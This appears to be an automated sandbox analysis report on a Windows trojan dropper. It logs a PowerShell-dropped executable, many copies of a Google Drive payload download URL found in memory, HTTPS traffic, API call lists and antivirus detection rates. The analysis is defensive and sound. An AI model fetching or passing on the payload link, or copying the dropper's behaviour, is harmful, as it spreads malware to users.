      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download&x
      Source: Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2204014071.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download1E
      Source: Kvababbelser58.exe, 00000007.00000003.2468899939.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2389230849.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2423609392.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2434863813.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.0000000005504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download7
      Source: Kvababbelser58.exe, 00000007.00000003.2607422737.0000000005503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download9
      Source: Kvababbelser58.exe, 00000007.00000003.2411860408.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2389230849.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2423609392.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2434863813.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.0000000005503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadC
      Source: Kvababbelser58.exe, 00000007.00000003.2434863813.0000000005506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadGE
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2178267049.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 
00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadJx
      Source: Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2343055092.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadNo
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadO
      Source: Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadS
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloaddy
      Source: Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloade
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloade4
      Source: Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadid
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadjy
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 
00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadnx
      Source: Kvababbelser58.exe, 00000007.00000002.2644866280.0000000005483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloads
      Source: Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2178267049.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2204014071.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2343055092.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 
00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadt
      Source: Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadtx
      Source: Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=doym
      Source: Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/ontent.sandbox.google.com
      Source: Kvababbelser58.exe, 00000007.00000003.2468899939.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2480038094.0000000005506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com;
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49969 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49970 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49977 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49979 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49987 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49991 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49993 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49995 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49999 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:50003 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:50005 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:50009 version: TLS 1.2
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B

      System Summary

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_00404C680_2_00404C68
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_0040698E0_2_0040698E
      Source: Cpfkf79Rzk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/13@2/2
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046EC
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeFile created: C:\Users\user\AppData\Roaming\luminancesJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsf64CD.tmpJump to behavior
      Source: Cpfkf79Rzk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Cpfkf79Rzk.exeReversingLabs: Detection: 55%
      Source: Cpfkf79Rzk.exeVirustotal: Detection: 70%
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeFile read: C:\Users\user\Desktop\Cpfkf79Rzk.exeJump to behavior
